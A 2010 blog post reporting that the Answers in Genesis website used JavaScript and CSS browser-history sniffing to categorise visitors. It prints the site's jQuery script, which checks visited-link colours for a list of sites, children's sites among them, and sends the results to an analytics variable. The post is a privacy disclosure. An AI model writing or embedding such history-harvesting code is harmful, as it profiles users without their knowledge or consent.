You are hereAnswers in Genesis Wants Your Secrets

Answers in Genesis Wants Your Secrets

  • strict warning: Non-static method view::load() should not be called statically in /home/vaduva/planetpreterist.com/sites/all/modules/views/views.module on line 842.
  • strict warning: Declaration of views_handler_argument::init() should be compatible with views_handler::init(&$view, $options) in /home/vaduva/planetpreterist.com/sites/all/modules/views/handlers/views_handler_argument.inc on line 745.
  • strict warning: Declaration of views_handler_filter::options_validate() should be compatible with views_handler::options_validate($form, &$form_state) in /home/vaduva/planetpreterist.com/sites/all/modules/views/handlers/views_handler_filter.inc on line 589.
  • strict warning: Declaration of views_handler_filter::options_submit() should be compatible with views_handler::options_submit($form, &$form_state) in /home/vaduva/planetpreterist.com/sites/all/modules/views/handlers/views_handler_filter.inc on line 589.
  • strict warning: Declaration of views_handler_filter_boolean_operator::value_validate() should be compatible with views_handler_filter::value_validate($form, &$form_state) in /home/vaduva/planetpreterist.com/sites/all/modules/views/handlers/views_handler_filter_boolean_operator.inc on line 149.

By Virgil - Posted on 04 December 2010

Just a few months ago I did a short presentation at the Ohio Information Security Forum on the dangers of CSS and Javascript browser history hijacking, with an actual demonstration on how your web browser's history can be parsed for interesting data for the purpose of harvesting information about your browsing habits.

A while back a team from the University of California, San Diego, came out with a white paper titled An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications. The team compiled a list of websites which are using the javascript history hijacking technique, including Answers in Genesis in the list of evaluated sites, along many other websites serving pornography, malware and other malicious content. AiG did not use the CSS-only technique I presented at OISF and only focused on Javascript+CSS, meaning that a user that had Javascript turned off in his browser would have been safe from this kind of attack.

Simply put, this technique works by presenting a list of known variables (in this instance websites and URLs) to the browser. Executed code then evaluates each browser's history, using something like "statExternalLinks" to determine whether or not the presented URL was visited by the user previously based on the link color (via CSS). This is not as much a vulnerability as it is a "feature" that is being used by abusive websites.

Below is the code that someone saved from AiG's website; as of today it appears that they are no longer using this intrusive approach, but the fact that they have used this extensively until recently is certainly not a good sign:

$(document).ready(function() {
var cookie = $.cookie('__utmv');

$("body").append("" +
// WEB2.0 USERS
"delicious" +
"googledocs" +
"digg" +
"stumbleupon" +
"twitter" +
// COMMUNITY USERS
"facebook" +
"myspace" +
"secondlife" +
// CREATIONIST GROUPIES
"icr" +
"drdino" +
"cmi" +
"crsq" +
// EVOLUTION NEWS FOLLOWERS
"newscientist" +
"sciam" +
"scienceblogs" +
"pzmeyer" +
"talkorigins" +
"dawkins" +
"ncse" +
// ID FOLLOWERS
"uncommondescent" +
"evonews" +
// MEDIA JUNKIES
"youtube" +
"godtube" +
"flickr" +
"picasa" +
"vimeo" +
"hulu" +
"movietrailers" +
// ONLINE SHOPPERS
"amazon" +
"ebay" +
"craigslist" +
"barnesnoble" +
"walmart" +
"target" +
// "CHRISTIAN" USERS
"macarthur" +
"sermonaudio" +
"christiananswers" +
"biblegateway" +
"focus" +
"pluggedin" +
"coralridge" +
"crosswalk" +
"oneplace" +
"visionforum" +
"ct" +
"castingcrowns" +
// KIDS USERS
"webkinz" +
"veggietales" +
"cartoonnetwork" +
"qubo" +
"lego" +
"mylego" +
"disney" +
"mydisney" +
"clubhouse" +
"whitsend" +
"cbh" +
"kids4truth" +
// OTHER
"museum" +
"wired" +
"wikipedia" +
"joelosteen" +
"beliefnet" +
"");

var userVars = '';
if (cookie != undefined) userVars = cookie.split(".")[1];

$("#statExternalLinks a").each(function() {
var curSite = $(this).text();
var color = $(this).css("color");
if (userVars.indexOf(curSite) == -1 &&
(color == "rgb(130, 129, 207)" ||
color == "#8281CF" ||
color == "#8281cf")) {

if (userVars.length > 0) userVars += "|";
userVars += curSite;

}
});
$("#statExternalLinks").remove();
pageTracker._setVar(userVars);
});

Note the websites in browsers' history used by AiG to "categorize" users.

Interesting indeed.

Recent comments

Poll

Should we allow Anonymous users to comment on Planet Preterist articles?
Yes absolutely
23%
No only registered users should comment
77%
What are you talking about?
0%
Total votes: 43